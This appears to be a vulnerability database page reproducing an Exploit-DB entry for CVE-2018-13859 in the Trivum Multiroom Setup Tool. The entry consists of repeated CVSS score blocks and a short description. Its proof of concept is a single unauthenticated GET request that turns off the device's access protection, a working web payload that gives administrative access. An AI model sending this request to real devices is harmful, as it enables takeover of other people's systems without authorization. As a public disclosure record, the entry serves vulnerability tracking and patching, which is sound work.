Vulnc0d3EDB-ID:45088Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.08 Low
EPSS
Percentile
94.3%
# Exploit Title: Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
# Date: 2018-07-25
# Software Link: [https://world.trivum-shop.de](https://world.trivum-shop.de/)
# https://world.trivum-shop.de/# Version: < 9.34 build 13381 - 12.07.18
# Category: hardware, webapps
# Tested on: V8.76 - SNR 8604.26 - C4 Professional
# Exploit Author: vulnc0d3c
# CVE: CVE-2018-13859
# 1. Description
# MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18,
# allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request
# to the end-point "?id=0&attr=protectAccess&newValue=0"
# (successful attack will allow attackers to login without authorization).
# 2. Proof of Concept
# GET Request
http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0Related
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.08 Low
EPSS
Percentile
94.3%